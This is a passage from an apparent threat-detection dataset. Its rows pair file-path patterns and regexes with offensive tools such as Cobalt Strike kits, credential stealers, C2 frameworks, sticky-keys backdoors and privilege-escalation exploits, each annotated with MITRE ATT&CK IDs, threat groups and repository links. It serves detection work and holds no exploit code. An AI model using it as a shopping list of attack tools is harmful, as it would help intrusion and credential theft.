- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/Staykit/StayKit.*",".{0,1000}\/Staykit\/StayKit\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","455","76","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*/Stealer.sln*",".{0,1000}\/Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*/stext credentials.log*",".{0,1000}\/stext\scredentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/stickykey.ps1*",".{0,1000}\/stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*/Stickykeys.sh*",".{0,1000}\/Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/stinger_client.py*",".{0,1000}\/stinger_client\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" 
"*/Stompy.git*",".{0,1000}\/Stompy\.git.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/Stompy.ps1*",".{0,1000}\/Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/StomPY.py*",".{0,1000}\/StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","10","1","45","7","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z" "*/Stowaway.git*",".{0,1000}\/Stowaway\.git.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/stowaway_admin*",".{0,1000}\/stowaway_admin.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*/stowaway_agent*",".{0,1000}\/stowaway_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" 
"*/Stracciatella/releases/latest/download/Stracciatella.exe*",".{0,1000}\/Stracciatella\/releases\/latest\/download\/Stracciatella\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*/striker.c",".{0,1000}\/striker\.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/Striker.git*",".{0,1000}\/Striker\.git.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/striker.local*",".{0,1000}\/striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - 
TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/striker.py",".{0,1000}\/striker\.py","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/string_of_paerls.profile*",".{0,1000}\/string_of_paerls\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/stun-info.nse*",".{0,1000}\/stun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stun-version.nse*",".{0,1000}\/stun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/stuxnet-detect.nse*",".{0,1000}\/stuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/subdomain.yaml*",".{0,1000}\/subdomain\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/subdomains.txt*",".{0,1000}\/subdomains\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*/subdomains-10000.txt*",".{0,1000}\/subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*/submit_to_nemesis.py*",".{0,1000}\/submit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/submit_to_nemesis.sh*",".{0,1000}\/submit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/submit_to_nemesis.yaml*",".{0,1000}\/submit_to_nemesis\.yaml.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Suborner.git*",".{0,1000}\/Suborner\.git.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*/sudo_tracer.c*",".{0,1000}\/sudo_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/sudomy.api*",".{0,1000}\/sudomy\.api.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*/sullo/nikto*",".{0,1000}\/sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" 
"*/sunlogin_rce*",".{0,1000}\/sunlogin_rce.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","474","199","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*/Sup3r-Us3r/scripts/*",".{0,1000}\/Sup3r\-Us3r\/scripts\/.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/supermicro-ipmi-conf.nse*",".{0,1000}\/supermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Supernova.exe*",".{0,1000}\/Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*/Supernova.git*",".{0,1000}\/Supernova\.git.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" 
"*/SuperProfileDLL*",".{0,1000}\/SuperProfileDLL.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Supershell.tar.gz*",".{0,1000}\/Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/supershell/login/auth*",".{0,1000}\/supershell\/login\/auth.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/Supershell/releases*",".{0,1000}\/Supershell\/releases.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","1275","159","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*/suspendresume.x64*",".{0,1000}\/suspendresume\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/suspendresume.x86*",".{0,1000}\/suspendresume\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/svn-brute.nse*",".{0,1000}\/svn\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SweetPotato.exe*",".{0,1000}\/SweetPotato\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Sweetpotato.exe*",".{0,1000}\/Sweetpotato\.exe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*/SweetPotato.git*",".{0,1000}\/SweetPotato\.git.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*/SweetPotato_CS*",".{0,1000}\/SweetPotato_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
